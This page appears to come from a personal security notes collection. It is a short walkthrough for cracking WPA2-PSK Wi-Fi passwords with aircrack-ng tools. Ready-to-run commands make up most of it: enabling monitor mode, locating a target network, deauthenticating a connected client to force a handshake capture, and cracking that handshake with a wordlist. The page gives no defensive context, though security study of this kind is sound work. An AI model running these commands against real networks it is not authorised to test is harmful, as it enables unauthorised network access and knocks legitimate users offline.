WPA2 PSK

Hacking process

Place wireless card into monitor mode
Discover information about network (Channel & BSSID)
Select network and capture data
Perform deauth attack
Capture WPA handshake
Attempt to crack the handshake

Exploit walkthrough

Monitor mode

iwconfig
airmon-ng check kill
airmon-ng start wlan0 #start monitor mode
iwconfig #verify

Discover informations

airodump-ng wlan0(mon)

#BSSID is the mac address
#PWR is the distance from the device (less the number is more we are close)
#CH is the channel
#ENC is the type (here WPA2)
#ESSID is the name od the SSID, if its hidden only the length is available

Select network and capture data

airodump-ng -c 6 --bssid <BSSID> -w capture wlan0(mon)
# -c for channel
# --bssid target router
# -w filename capture

After that we will see the device attached to the network.

Then to capture the handshake we can wait or to speed this process we have to kick the user connected from the network.

Perform deauth attack

# Open a new tab
aireplay-ng -0 1 -a <BSSID> -c <client_mac_address> wlan0mon
# -0 means deauth and 1 = run one time

Capture WPA handshake

The deauth process start, the WPA handshake should pop up in the other tab. Look at the capture.cap.

Attempt to crack the handshake

aircrack-ng -w <wordlist.txt> -b <BSSID> capture.cap

PreviousCSRF NextRadare2

Last updated 4 years ago

Was this helpful?